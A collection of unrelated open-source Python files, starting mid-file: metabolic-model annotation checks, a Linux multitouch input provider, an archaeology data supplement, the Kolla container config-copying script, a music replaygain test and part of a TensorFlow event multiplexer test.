r"(\/[cnpqbtmsih][A-Za-z0-9\-\+\(\)\,\/\?\;\.]+)*$"
),
),
("chebi", re.compile(r"^CHEBI:\d+$")),
("hmdb", re.compile(r"^HMDB\d{5}$")),
(
"reactome",
re.compile(r"(^R-[A-Z]{3}-[0-9]+(-[0-9]+)?$)|(^REACT_\d+(\.\d+)?$)"),
),
("metanetx.chemical", re.compile(r"^MNXM\d+$")),
("bigg.metabolite", re.compile(r"^[a-z_A-Z0-9]+$")),
("biocyc", re.compile(r"^[A-Z-0-9]+(?<!CHEBI)(\:)?[A-Za-z0-9+_.%-]+$")),
]
)
def find_components_without_annotation(model, components):
"""
Find model components with empty annotation attributes.
Parameters
----------
model : cobra.Model
A cobrapy metabolic model.
components : {"metabolites", "reactions", "genes"}
A string denoting `cobra.Model` components.
Returns
-------
list
The components without any annotation.
"""
return [
elem
for elem in getattr(model, components)
if elem.annotation is None or len(elem.annotation) == 0
]
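# A minimal usage sketch for the helper above; `model` is assumed to be a
# loaded cobrapy model (hypothetical in this context):
#
#   missing = find_components_without_annotation(model, "metabolites")
#   print(len(missing), "metabolites carry no annotation at all")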
def generate_component_annotation_overview(elements, db):
"""
List the components whose annotation lacks the given MIRIAM database.
Parameters
----------
elements : list
Elements of a model, either metabolites, reactions, or genes.
db : str
One of the MIRIAM database identifiers.
Returns
-------
list
The components that are not annotated with the specified MIRIAM
database.
"""
return [elem for elem in elements if db not in elem.annotation]
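# For example (hypothetical model), the metabolites lacking a ChEBI entry in
# their annotation could be collected with:
#
#   no_chebi = generate_component_annotation_overview(model.metabolites, "chebi")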
def generate_component_annotation_miriam_match(elements, component, db):
"""
Identify elements whose annotation does not match the MIRIAM pattern of the given database.
If the relevant MIRIAM identifier is not in an element's annotation it is
ignored.
Parameters
----------
elements : list
Elements of a model, either metabolites or reactions.
component : {"metabolites", "reactions"}
A string denoting a type of ``cobra.Model`` component.
db : str
One of the MIRIAM database identifiers.
Returns
-------
list
The components whose annotation does not match the pattern for the
MIRIAM database.
"""
def is_faulty(annotation, key, pattern):
# Ignore missing annotation for this database.
if key not in annotation:
return False
test = annotation[key]
if isinstance(test, native_str):
return pattern.match(test) is None
else:
return any(pattern.match(elem) is None for elem in test)
pattern = {
"metabolites": METABOLITE_ANNOTATIONS,
"reactions": REACTION_ANNOTATIONS,
"genes": GENE_PRODUCT_ANNOTATIONS,
}[component][db]
return [elem for elem in elements if is_faulty(elem.annotation, db, pattern)]
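# Sketch of intended use (the model is hypothetical): flag metabolites whose
# 'chebi' annotation does not match the MIRIAM pattern defined above.
#
#   bad_chebi = generate_component_annotation_miriam_match(
#       model.metabolites, "metabolites", "chebi")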
def generate_component_id_namespace_overview(model, components):
"""
Tabulate which MIRIAM databases the component's identifier matches.
Parameters
----------
model : cobra.Model
A cobrapy metabolic model.
components : {"metabolites", "reactions", "genes"}
A string denoting `cobra.Model` components.
Returns
-------
pandas.DataFrame
The index of the table is given by the component identifiers. Each
column corresponds to one MIRIAM database and a Boolean entry
determines whether the annotation matches.
"""
patterns = {
"metabolites": METABOLITE_ANNOTATIONS,
"reactions": REACTION_ANNOTATIONS,
"genes": GENE_PRODUCT_ANNOTATIONS,
}[components]
databases = list(patterns)
data = list()
index = list()
for elem in getattr(model, components):
index.append(elem.id)
data.append(tuple(patterns[db].match(elem.id) is not None for db in databases))
df = pd.DataFrame(data, index=index, columns=databases)
if components != "genes":
# Clean up the dataframe. Unfortunately the Biocyc patterns match
# broadly, so whenever a Metabolite or Reaction ID matches both the
# Biocyc pattern and any other DB pattern we assume the Biocyc hit
# is a false positive.
# First determine all rows in which 'biocyc' and other entries are
# True simultaneously and use this Boolean series to create another
# column temporarily.
df["duplicate"] = df[df["biocyc"]].sum(axis=1) >= 2
# Replace all nan values with False
df["duplicate"].fillna(False, inplace=True)
# Use the additional column to index the original dataframe to identify
# false positive biocyc hits and set them to False.
df.loc[df["duplicate"], "biocyc"] = False
# Delete the additional column
del df["duplicate"]
return df
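# Illustrative result (identifiers are made up): for a metabolite whose ID is
# 'C00031', the 'kegg.compound' column would be True (it matches ^C\d+$) while
# 'chebi' would be False; the returned DataFrame holds one such Boolean row
# per component.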
|
'''
MTDev: Native support of Multitouch device on Linux, using libmtdev.
Mtdev project is a part of Ubuntu Maverick multitouch architecture.
You can read more on http://wiki.ubuntu.com/Multitouch
To configure MTDev, it's preferable to use probesysfs providers.
Check :py:class:`~pymt.input.providers.probesysfs` for more information.
Otherwise, you can put in your configuration ::
[input]
# devicename = hidinput,/dev/input/eventXX
acert230h = mtdev,/dev/input/event2
.. note::
You must have read access to the input event.
You can use custom ranges for the X, Y and pressure values.
On some drivers, the reported range is invalid.
To fix that, add one or more of these options on the argument line (see the example after this list):
* invert_x : 1 to invert X axis
* invert_y : 1 to invert Y axis
* min_position_x : X minimum
* max_position_x : X maximum
* min_position_y : Y minimum
* max_position_y : Y maximum
* min_pressure : pressure minimum
* max_pressure : pressure maximum
* min_touch_major : width shape minimum
* max_touch_major : width shape maximum
* min_touch_minor : height shape minimum
* max_touch_minor : height shape maximum
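For example, several options can be combined on one configuration line
(the device path and values here are purely illustrative)::
[input]
acert230h = mtdev,/dev/input/event2,invert_y=1,min_pressure=0,max_pressure=255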
'''
__all__ = ('MTDTouchProvider', 'MTDTouch')
import os
from pymt.input.touch import Touch
from pymt.input.shape import TouchShapeRect
class MTDTouch(Touch):
def depack(self, args):
self.sx = args['x']
self.sy = args['y']
self.profile = ['pos']
if 'size_w' in args and 'size_h' in args:
self.shape = TouchShapeRect()
self.shape.width = args['size_w']
self.shape.height = args['size_h']
self.profile.append('shape')
if 'pressure' in args:
self.pressure = args['pressure']
self.profile.append('pressure')
super(MTDTouch, self).depack(args)
def __str__(self):
return '<MTDTouch id=%d pos=(%f, %f) device=%s>' % (self.id, self.sx, self.sy, self.device)
if 'PYMT_DOC' in os.environ:
# documentation hack
MTDTouchProvider = None
else:
import threading
import collections
from pymt.lib.mtdev import Device, \
MTDEV_TYPE_EV_ABS, MTDEV_CODE_SLOT, MTDEV_CODE_POSITION_X, \
MTDEV_CODE_POSITION_Y, MTDEV_CODE_PRESSURE, \
MTDEV_CODE_TOUCH_MAJOR, MTDEV_CODE_TOUCH_MINOR, \
MTDEV_CODE_TRACKING_ID, MTDEV_ABS_POSITION_X, \
MTDEV_ABS_POSITION_Y, MTDEV_ABS_TOUCH_MINOR, \
MTDEV_ABS_TOUCH_MAJOR
from pymt.input.provider import TouchProvider
from pymt.input.factory import TouchFactory
from pymt.logger import pymt_logger
class MTDTouchProvider(TouchProvider):
options = ('min_position_x', 'max_position_x',
'min_position_y', 'max_position_y',
'min_pressure', 'max_pressure',
'min_touch_major', 'max_touch_major',
'min_touch_minor', 'max_touch_minor',
'invert_x', 'invert_y')
def __init__(self, device, args):
super(MTDTouchProvider, self).__init__(device, args)
self._device = None
self.input_fn = None
self.default_ranges = dict()
# split arguments
args = args.split(',')
if not args:
pymt_logger.error('MTD: No filename passed in the MTD configuration')
pymt_logger.error('MTD: Use /dev/input/event0 for example')
return None
# read filename
self.input_fn = args[0]
pymt_logger.info('MTD: Read event from <%s>' % self.input_fn)
# read parameters
for arg in args[1:]:
if arg == '':
continue
arg = arg.split('=')
# ensure it's a key = value
if len(arg) != 2:
pymt_logger.error('MTD: invalid parameter %s, not in key=value format.' % arg)
continue
# ensure the key exists
key, value = arg
if key not in MTDTouchProvider.options:
pymt_logger.error('MTD: unknown %s option' % key)
continue
# ensure the value
try:
self.default_ranges[key] = int(value)
except ValueError:
pymt_logger.error('MTD: invalid value %s for option %s' % (key, value))
continue
# all good!
pymt_logger.info('MTD: Set custom %s to %d' % (key, int(value)))
def start(self):
if self.input_fn is None:
return
self.uid = 0
self.queue = collections.deque()
self.thread = threading.Thread(
target=self._thread_run,
kwargs=dict(
queue=self.queue,
input_fn=self.input_fn,
device=self.device,
default_ranges=self.default_ranges
))
self.thread.daemon = True
self.thread.start()
def _thread_run(self, **kwargs):
input_fn = kwargs.get('input_fn')
queue = kwargs.get('queue')
device = kwargs.get('device')
drs = kwargs.get('default_ranges').get
touches = {}
touches_sent = []
point = {}
l_points = {}
def process(points):
for args in points:
tid = args['id']
try:
touch = touches[tid]
except KeyError:
touch = MTDTouch(device, tid, args)
touches[touch.id] = touch
touch.move(args)
action = 'move'
if tid not in touches_sent:
action = 'down'
touches_sent.append(tid)
if 'delete' in args:
action = 'up'
del args['delete']
del touches[touch.id]
touches_sent.remove(tid)
queue.append((action, touch))
def normalize(value, vmin, vmax):
return (value - vmin) / float(vmax - vmin)
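# For example (illustrative values): normalize(512, 0, 1024) == 0.5, so raw
# axis readings are mapped into the 0..1 range used by the touch events.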
# open mtdev device
_fn = self.input_fn
_slot = 0
_device = Device(_fn)
_changes = set()
# read the absolute axis limits reported by the device, allowing overrides from the provider options
ab = _device.get_abs(MTDEV_ABS_POSITION_X)
range_min_position_x = drs('min_position_x', ab.minimum)
range_max_position_x = drs('max_position_x', ab.maximum)
pymt_logger.info('MTD: <%s> range position X is %d - %d' %
(_fn, range_min_position_x, range_max_position_x))
ab = _device.get_abs(MTDEV_ABS_POSITION_Y)
range_min_position_y = drs('min_position_y', ab.minimum)
range_max_position_y = drs('max_position_y', ab.maximum)
pymt_logger.info('MTD: <%s> range position Y is %d - %d' %
(_fn, range_min_position_y, range_max_position_y))
ab = _device.get_abs(MTDEV_ABS_TOUCH_MAJOR)
range_min_major = drs('min_touch_major', ab.minimum)
range_max_major = drs('max_touch_major', ab.maximum)
pymt_logger.info('MTD: <%s> range touch major is %d - %d' %
(_fn, range_min_major, range_max_major))
ab = _device.get_abs(MTDEV_ABS_TOUCH_MINOR)
range_min_minor = drs('min_touch_minor', ab.minimum)
range_max_minor = drs('max_touch_minor', ab.maximum)
pymt_logger.info('MTD: <%s> range touch minor is %d - %d' %
(_fn, range_min_minor, range_max_minor))
range_min_pressure = drs('min_pressure', 0)
range_max_pressure = drs('max_pressure', 255)
pymt_logger.info('MTD: <%s> range pressure is %d - %d' %
(_fn, range_min_pressure, range_max_pressure))
invert_x = int(bool(drs('invert_x', 0)))
invert_y = int(bool(drs('invert_y', 0)))
pymt_logger.info('MTD: <%s> axes inversion: X is %d, Y is %d' %
(_fn, invert_x, invert_y))
while _device:
# idle as much as we can.
while _device.idle(1000):
continue
# got data, read all without redoing idle
while True:
data = _device.get()
if data is None:
break
# set the working slot
if data.type == MTDEV_TYPE_EV_ABS and \
data.code == MTDEV_CODE_SLOT:
_slot = data.value
continue
# fill the slot
if not _slot in l_points:
l_points[_slot] = dict()
point = l_points[_slot]
ev_value = data.value
ev_code = data.code
if ev_code == MTDEV_CODE_POSITION_X:
val = normalize(ev_value,
range_min_position_x, range_max_position_x)
if invert_x:
val = 1. - val
point['x'] = val
elif ev_code == MTDEV_CODE_POSITION_Y:
val = 1. - normalize(ev_value,
range_min_position_y, range_max_position_y)
if invert_y:
val = 1. - val
point['y'] = val
elif ev_code == MTDEV_CODE_PRESSURE:
point['pressure'] = normalize(ev_value,
range_min_pressure, range_max_pressure)
elif ev_code == MTDEV_CODE_TOUCH_MAJOR:
point['size_w'] = normalize(ev_value,
range_min_major, range_max_major)
elif ev_code == MTDEV_CODE_TOUCH_MINOR:
point['size_h'] = normalize(ev_value,
range_min_minor, range_max_minor)
elif ev_code == MTDEV_CODE_TRACKING_ID:
if ev_value == -1:
point['delete'] = True
else:
point['id'] = ev_value
else:
# unrecognized event code, ignore.
continue
_changes.add(_slot)
# push all changes
if _changes:
process([l_points[x] for x in _changes])
_changes.clear()
def update(self, dispatch_fn):
# dispatch all event from threads
try:
while True:
event_type, touch = self.queue.popleft()
dispatch_fn(event_type, touch)
except:
pass
TouchFactory.register('mtdev', MTDTouchProvider)
|
from opencontext_py.libs.general import LastUpdatedOrderedDict
from opencontext_py.apps.ocitems.ocitem.models import OCitem
from opencontext_py.apps.ldata.catallivingarchive.api import CatalLivingArchiveAPI
class SubjectSupplement():
""" Class for adding related, supplemental information about types
"""
def __init__(self, item_json):
self.item_json = item_json
def get_catal_related(self):
""" Check to see if this item has related data
in the Çatalhöyük Living Archive
"""
label = self.item_json['label']
category_list = []
project_list = []
if 'category' in self.item_json:
category_list = self.item_json['category']
if 'dc-terms:isPartOf' in self.item_json:
project_list = self.item_json['dc-terms:isPartOf']
catal_api = CatalLivingArchiveAPI()
catal_api.check_relevance(category_list,
project_list)
if catal_api.relevant:
catal_api.get_unit(label)
if catal_api.has_data:
editorial_pred = LastUpdatedOrderedDict()
editorial_pred['owl:sameAs'] = 'http://www.w3.org/2004/02/skos/core#editorialNote'
editorial_pred['slug'] = 'skos-editorialnote'
editorial_pred['label'] = 'About Çatalhöyük Living Archive Data'
editorial_pred['oc-gen:predType'] = 'variable'
editorial_pred['type'] = 'xsd:string'
props_pred = LastUpdatedOrderedDict()
props_pred['owl:sameAs'] = 'http://www.w3.org/2004/02/skos/core#definition'
props_pred['slug'] = 'skos-definition'
props_pred['label'] = 'Çatalhöyük Living Archive: Unit Properties'
props_pred['oc-gen:predType'] = 'variable'
props_pred['type'] = 'xsd:string'
finds_pred = LastUpdatedOrderedDict()
finds_pred['owl:sameAs'] = 'http://www.w3.org/2004/02/skos/core#note'
finds_pred['slug'] = 'skos-note'
finds_pred['label'] = 'Çatalhöyük Living Archive: Unit Finds'
finds_pred['oc-gen:predType'] = 'variable'
finds_pred['type'] = 'xsd:string'
self.item_json['@context'][1]['skos:editorialNote'] = editorial_pred
if catal_api.props_count > 0:
self.item_json['@context'][1]['skos:definition'] = props_pred
if catal_api.finds_count > 0:
self.item_json['@context'][1]['skos:note'] = finds_pred
self.add_catal_observation(catal_api)
return self.item_json
def add_catal_observation(self, catal_api):
""" Adds an observation for Catal API data """
if 'oc-gen:has-obs' not in self.item_json:
self.item_json['oc-gen:has-obs'] = []
catal_obs = LastUpdatedOrderedDict()
catal_obs['id'] = '#obs-' + str(len(self.item_json['oc-gen:has-obs']) + 1)
catal_obs['oc-gen:sourceID'] = catal_api.BASE_HTML_URL
catal_obs['oc-gen:obsStatus'] = 'active'
catal_obs[OCitem.PREDICATES_OCGEN_OBSLABEL] = 'Çatalhöyük Living Archive Data'
catal_obs['type'] = 'oc-gen:observations'
if catal_api.props_count > 0:
catal_obs['skos:definition'] = catal_api.properties
if catal_api.finds_count > 0:
catal_obs['skos:note'] = catal_api.finds
editorial = LastUpdatedOrderedDict()
editorial['id'] = '#string-catal-editorial'
note = ''
note += '<p>The Çatalhöyük Living Archive describes this unit with: </p>'
note += '<ul>'
if catal_api.props_count > 0:
note += '<li><strong>' + str(catal_api.props_count) + '</strong> descriptive properties</li>'
if catal_api.finds_count > 0:
note += '<li><strong>' + str(catal_api.finds_count) + '</strong> finds (other than animal bones)</li>'
note += '</ul>'
note += '<p><small>Open Context requested these current ("live") data through an external API. '
note += 'The <a href="http://catalhoyuk.stanford.edu//" target="_blank">Çatalhöyük Living Archive</a> '
note += 'has powerful analysis and visualization tools for use with the comprehensive '
note += 'database documenting recent excavations at Çatalhöyük. '
note += 'Stanford University sponsored and hosts this project.</small></p>'
editorial['xsd:string'] = note
catal_obs['skos:editorialNote'] = []
catal_obs['skos:editorialNote'].append(editorial)
self.item_json['oc-gen:has-obs'].append(catal_obs)
|
#!/usr/bin/env python
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import glob
import grp
import json
import logging
import os
import pwd
import shutil
import sys
# TODO(rhallisey): add docstring.
logging.basicConfig()
LOG = logging.getLogger(__name__)
LOG.setLevel(logging.INFO)
class ExitingException(Exception):
def __init__(self, message, exit_code=1):
super(ExitingException, self).__init__(message)
self.exit_code = exit_code
class ImmutableConfig(ExitingException):
pass
class InvalidConfig(ExitingException):
pass
class MissingRequiredSource(ExitingException):
pass
class UserNotFound(ExitingException):
pass
class ConfigFileBadState(ExitingException):
pass
class ConfigFile(object):
def __init__(self, source, dest, owner=None, perm=None, optional=False,
preserve_properties=False, merge=False):
self.source = source
self.dest = dest
self.owner = owner
self.perm = perm
self.optional = optional
self.merge = merge
self.preserve_properties = preserve_properties
def __str__(self):
return '<ConfigFile source:"{}" dest:"{}">'.format(self.source,
self.dest)
def _copy_file(self, source, dest):
self._delete_path(dest)
# dest endswith / means copy the <source> to <dest> folder
LOG.info('Copying %s to %s', source, dest)
if self.merge and self.preserve_properties and os.path.islink(source):
link_target = os.readlink(source)
os.symlink(link_target, dest)
else:
shutil.copy(source, dest)
self._set_properties(source, dest)
def _merge_directories(self, source, dest):
if os.path.isdir(source):
if os.path.lexists(dest) and not os.path.isdir(dest):
self._delete_path(dest)
if not os.path.isdir(dest):
LOG.info('Creating directory %s', dest)
os.makedirs(dest)
self._set_properties(source, dest)
dir_content = os.listdir(source)
for to_copy in dir_content:
self._merge_directories(os.path.join(source, to_copy),
os.path.join(dest, to_copy))
else:
self._copy_file(source, dest)
def _delete_path(self, path):
if not os.path.lexists(path):
return
LOG.info('Deleting %s', path)
if os.path.isdir(path):
shutil.rmtree(path)
else:
os.remove(path)
def _create_parent_dirs(self, path):
parent_path = os.path.dirname(path)
if not os.path.exists(parent_path):
os.makedirs(parent_path)
def _set_properties(self, source, dest):
if self.preserve_properties:
self._set_properties_from_file(source, dest)
else:
self._set_properties_from_conf(dest)
def _set_properties_from_file(self, source, dest):
shutil.copystat(source, dest)
stat = os.stat(source)
os.chown(dest, stat.st_uid, stat.st_gid)
def _set_properties_from_conf(self, path):
config = {'permissions':
[{'owner': self.owner, 'path': path, 'perm': self.perm}]}
handle_permissions(config)
def copy(self):
sources = glob.glob(self.source)
if not self.optional and not sources:
raise MissingRequiredSource('%s file is not found' % self.source)
# skip when there are no sources and the config file is optional
elif self.optional and not sources:
return
for source in sources:
dest = self.dest
# dest endswith / means copy the <source> into <dest> folder,
# otherwise means copy the source to dest
if dest.endswith(os.sep):
dest = os.path.join(dest, os.path.basename(source))
if not self.merge:
self._delete_path(dest)
self._create_parent_dirs(dest)
try:
self._merge_directories(source, dest)
except OSError:
# Merging a source into a read-only mount may raise an OSError.
# Since the source and dest are not logged anywhere else, catch
# the exception and log a clearer message to help track down the
# issue.
LOG.error('Unable to merge %s with %s', source, dest)
raise
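# Illustration of the trailing-slash rule used in copy() (paths are
# hypothetical): with source '/var/lib/kolla/config_files/nova.conf' and
# dest '/etc/nova/', the file lands at '/etc/nova/nova.conf'; with
# dest '/etc/nova/nova.conf', that exact path is used.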
def _cmp_file(self, source, dest):
# check existence
if (os.path.exists(source) and
not self.optional and
not os.path.exists(dest)):
return False
# check content
with open(source) as f1, open(dest) as f2:
if f1.read() != f2.read():
LOG.error('The content of source file(%s) and'
' dest file(%s) are not equal.', source, dest)
return False
# check perm
file_stat = os.stat(dest)
actual_perm = oct(file_stat.st_mode)[-4:]
if self.perm != actual_perm:
LOG.error('Dest file does not have expected perm: %s, actual: %s',
self.perm, actual_perm)
return False
# check owner
desired_user, desired_group = user_group(self.owner)
actual_user = pwd.getpwuid(file_stat.st_uid)
if actual_user.pw_name != desired_user:
LOG.error('Dest file does not have expected user: %s,'
' actual: %s ', desired_user, actual_user.pw_name)
return False
actual_group = grp.getgrgid(file_stat.st_gid)
if actual_group.gr_name != desired_group:
LOG.error('Dest file does not have expected group: %s,'
' actual: %s ', desired_group, actual_group.gr_name)
return False
return True
def _cmp_dir(self, source, dest):
for root, dirs, files in os.walk(source):
for dir_ in dirs:
full_path = os.path.join(root, dir_)
dest_full_path = os.path.join(dest, os.path.relpath(source,
full_path))
dir_stat = os.stat(dest_full_path)
actual_perm = oct(dir_stat.st_mode)[-4:]
if self.perm != actual_perm:
LOG.error('Dest dir does not have expected perm: %s,'
' actual %s', self.perm, actual_perm)
return False
for file_ in files:
full_path = os.path.join(root, file_)
dest_full_path = os.path.join(dest, os.path.relpath(source,
full_path))
if not self._cmp_file(full_path, dest_full_path):
return False
return True
def check(self):
bad_state_files = []
sources = glob.glob(self.source)
if not sources and not self.optional:
raise MissingRequiredSource('%s file is not found' % self.source)
elif self.optional and not sources:
return
for source in sources:
dest = self.dest
# dest endswith / means copy the <source> into <dest> folder,
# otherwise means copy the source to dest
if dest.endswith(os.sep):
dest = os.path.join(dest, os.path.basename(source))
if os.path.isdir(source) and not self._cmp_dir(source, dest):
bad_state_files.append(source)
elif not self._cmp_file(source, dest):
bad_state_files.append(source)
if len(bad_state_files) != 0:
msg = 'Following files are in bad state: %s' % bad_state_files
raise ConfigFileBadState(msg)
def validate_config(config):
required_keys = {'source', 'dest'}
if 'command' not in config:
raise InvalidConfig('Config is missing required "command" key')
# Validate config sections
for data in config.get('config_files', list()):
# Verify required keys exist.
if not set(data.keys()) >= required_keys:
message = 'Config is missing required keys: %s' % required_keys
raise InvalidConfig(message)
if ('owner' not in data or 'perm' not in data) \
and not data.get('preserve_properties', False):
raise InvalidConfig(
'Config needs preserve_properties or owner and perm')
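# A minimal config that satisfies validate_config() might look like this
# (service name, paths and owner are illustrative only):
#
#   {
#       "command": "/usr/bin/nova-api",
#       "config_files": [
#           {
#               "source": "/var/lib/kolla/config_files/nova.conf",
#               "dest": "/etc/nova/nova.conf",
#               "owner": "nova",
#               "perm": "0600"
#           }
#       ]
#   }
#
# The 'owner' value may also use the 'user:group' form parsed by user_group()
# below.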
def validate_source(data):
source = data.get('source')
# Only check existence if no wildcard found
if '*' not in source:
if not os.path.exists(source):
if data.get('optional'):
LOG.info("%s does not exist, but is not required", source)
return False
else:
raise MissingRequiredSource(
"The source to copy does not exist: %s" % source)
return True
def load_config():
def load_from_env():
config_raw = os.environ.get("KOLLA_CONFIG")
if config_raw is None:
return None
# Attempt to read config
try:
return json.loads(config_raw)
except ValueError:
raise InvalidConfig('Invalid json for Kolla config')
def load_from_file():
config_file = os.environ.get("KOLLA_CONFIG_FILE")
if not config_file:
config_file = '/var/lib/kolla/config_files/config.json'
LOG.info("Loading config file at %s", config_file)
# Attempt to read config file
with open(config_file) as f:
try:
return json.load(f)
except ValueError:
raise InvalidConfig(
"Invalid json file found at %s" % config_file)
except IOError as e:
raise InvalidConfig(
"Could not read file %s: %r" % (config_file, e))
config = load_from_env()
if config is None:
config = load_from_file()
LOG.info('Validating config file')
validate_config(config)
return config
def copy_config(config):
if 'config_files' in config:
LOG.info('Copying service configuration files')
for data in config['config_files']:
config_file = ConfigFile(**data)
config_file.copy()
else:
LOG.debug('No files to copy found in config')
LOG.info('Writing out command to execute')
LOG.debug("Command is: %s", config['command'])
# The value from the 'command' key will be written to '/run_command'
cmd = '/run_command'
with open(cmd, 'w+') as f:
f.write(config['command'])
# Make sure the generated file is readable by all users
try:
os.chmod(cmd, 0o644)
except OSError:
LOG.exception('Failed to set permission of %s to 0o644', cmd)
def user_group(owner):
if ':' in owner:
user, group = owner.split(':', 1)
if not group:
group = user
else:
user, group = owner, owner
return user, group
def handle_permissions(config):
for permission in config.get('permissions', list()):
path = permission.get('path')
owner = permission.get('owner')
recurse = permission.get('recurse', False)
perm = permission.get('perm')
desired_user, desired_group = user_group(owner)
uid = pwd.getpwnam(desired_user).pw_uid
gid = grp.getgrnam(desired_group).gr_gid
def set_perms(path, uid, gid, perm):
LOG.info('Setting permission for %s', path)
if not os.path.exists(path):
LOG.warning('%s does not exist', path)
return
try:
os.chown(path, uid, gid)
except OSError:
LOG.exception('Failed to change ownership of %s to %s:%s',
path, uid, gid)
if perm:
# NOTE(Jeffrey4l): py3 needs the '0oXXX' format for octal literals,
# and py2 accepts that format as well.
if len(perm) == 4 and perm[1] != 'o':
perm = ''.join([perm[:1], 'o', perm[1:]])
perm = int(perm, base=0)
try:
os.chmod(path, perm)
except OSError:
LOG.exception('Failed to set permission of %s to %s',
path, perm)
for dest in glob.glob(path):
set_perms(dest, uid, gid, perm)
if recurse and os.path.isdir(dest):
for root, dirs, files in os.walk(dest):
for dir_ in dirs:
set_perms(os.path.join(root, dir_), uid, gid, perm)
for file_ in files:
set_perms(os.path.join(root, file_), uid, gid, perm)
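# Sketch of a 'permissions' entry consumed by handle_permissions(); the path
# and owner are hypothetical, while the key names and the "0644" -> 0o644
# handling follow the code above:
#
#   {"path": "/var/log/kolla/nova/*", "owner": "nova:nova",
#    "perm": "0644", "recurse": true}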
def execute_config_strategy(config):
config_strategy = os.environ.get("KOLLA_CONFIG_STRATEGY")
LOG.info("Kolla config strategy set to: %s", config_strategy)
if config_strategy == "COPY_ALWAYS":
copy_config(config)
handle_permissions(config)
elif config_strategy == "COPY_ONCE":
if os.path.exists('/configured'):
raise ImmutableConfig(
"The config strategy prevents copying new configs",
exit_code=0)
else:
copy_config(config)
handle_permissions(config)
os.mknod('/configured')
else:
raise InvalidConfig('KOLLA_CONFIG_STRATEGY is not set properly')
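# The two strategies accepted above, as they would appear in the container
# environment (illustrative):
#
#   KOLLA_CONFIG_STRATEGY=COPY_ALWAYS   # re-copy config files on every start
#   KOLLA_CONFIG_STRATEGY=COPY_ONCE     # copy once; /configured blocks later runs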
def execute_config_check(config):
for data in config['config_files']:
config_file = ConfigFile(**data)
config_file.check()
def main():
try:
parser = argparse.ArgumentParser()
parser.add_argument('--check',
action='store_true',
required=False,
help='Check whether the configs changed')
args = parser.parse_args()
config = load_config()
if args.check:
execute_config_check(config)
else:
execute_config_strategy(config)
except ExitingException as e:
LOG.error("%s: %s", e.__class__.__name__, e)
return e.exit_code
except Exception:
LOG.exception('Unexpected error:')
return 2
return 0
if __name__ == "__main__":
sys.exit(main())
|
# MusicPlayer, https://github.com/albertz/music-player
# Copyright (c) 2012, Albert Zeyer, www.az2000.de
# All rights reserved.
# This code is under the 2-clause BSD license, see License.txt in the root directory of this project.
import better_exchook
better_exchook.install()
class Song:
def __init__(self, fn):
self.url = fn
self.f = open(fn, "rb")  # read raw bytes, not text
def readPacket(self, bufSize):
s = self.f.read(bufSize)
return s
def seekRaw(self, offset, whence):
r = self.f.seek(offset, whence)
return self.f.tell()
import sys, os
if len(sys.argv) == 2:
filename = sys.argv[1]
else:
files = [
"~/Music/Classic/Glenn Gould Plays Bach/Two- & Three-Part Inventions - Gould/19 Bach - Invention 13 in a (BWV 784).mp3",
"~/Music/Rock/Tool/Lateralus/09 Lateralus.flac",
"~/Music/Cults - Cults 7/Cults - Cults 7- - 03 The Curse.flac",
"~/Music/Special/zorba/(01) - Theme From Zorba The Greek.ogg",
"~/Music/Classic/Glenn Gould Plays Bach/French Suites, BWV812-7 - Gould/Bach, French Suite 5 in G, BWV816 - 5 Bourree.mp3",
"~/Music/Electronic/Von Paul Kalkbrenner - Aaron.mp3",
"~/Music/Electronic/One Day_Reckoning Song (Wankelmut Remix) - Asaf Avidan & the Mojos.mp3",
"~/Music/Electronic/Swing & Electro Swing/Parov Stelar/2008 - Daylight (Japan Only)/03 - Charlestone Butterfly.flac", # this one has replaygain metadata
]
files = list(map(os.path.expanduser, files))  # list() so it stays indexable below
filename = files[7]
print(os.path.basename(filename))
assert os.path.isfile(filename)
import ffmpeg
metadata = ffmpeg.getMetadata(Song(filename))
from pprint import pprint
pprint(metadata)
duration, replaygain = ffmpeg.calcReplayGain(Song(filename))
print("duration: %f" % duration)
print("replaygain: %f" % replaygain)
print("gain factor: %f" % (10. ** (replaygain / 20)))
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import os.path
import shutil
from tensorflow.python.framework import test_util
from tensorflow.python.platform import gfile
from tensorflow.python.platform import googletest
from tensorflow.python.summary import event_accumulator
from tensorflow.python.summary import event_multiplexer
def _AddEvents(path):
if not gfile.IsDirectory(path):
gfile.MakeDirs(path)
fpath = os.path.join(path, 'hypothetical.tfevents.out')
with gfile.GFile(fpath, 'w') as f:
f.write('')
return fpath
def _CreateCleanDirectory(path):
if gfile.IsDirectory(path):
gfile.DeleteRecursively(path)
gfile.MkDir(path)
class _FakeAccumulator(object):
def __init__(self, path):
self._path = path
self.reload_called = False
self._node_names_to_health_pills = {'Add': ['hp1', 'hp2']}
def Tags(self):
return {event_accumulator.IMAGES: ['im1', 'im2'],
event_accumulator.AUDIO: ['snd1', 'snd2'],
event_accumulator.HISTOGRAMS: ['hst1', 'hst2'],
event_accumulator.COMPRESSED_HISTOGRAMS: ['cmphst1', 'cmphst2'],
event_accumulator.SCALARS: ['sv1', 'sv2']}
def FirstEventTimestamp(self):
return 0
def _TagHelper(self, tag_name, enum):
if tag_name not in self.Tags()[enum]:
raise KeyError
return ['%s/%s' % (self._path, tag_name)]
def Scalars(self, tag_name):
return self._TagHelper(tag_name, event_accumulator.SCALARS)
def HealthPills(self, node_name):
if node_name not in self._node_names_to_health_pills:
raise KeyError
health_pills = self._node_names_to_health_pills[node_name]
return [self._path + '/' + health_pill for health_pill in health_pills]
def Histograms(self, tag_name):
return self._TagHelper(tag_name, event_accumulator.HISTOGRAMS)
def CompressedHistograms(self, tag_name):
return self._TagHelper(tag_name, event_accumulator.COMPRESSED_HISTOGRAMS)
def Images(self, tag_name):
return self._TagHelper(tag_name, event_accumulator.IMAGES)
def Audio(self, tag_name):
return self._TagHelper(tag_name, event_accumulator.AUDIO)
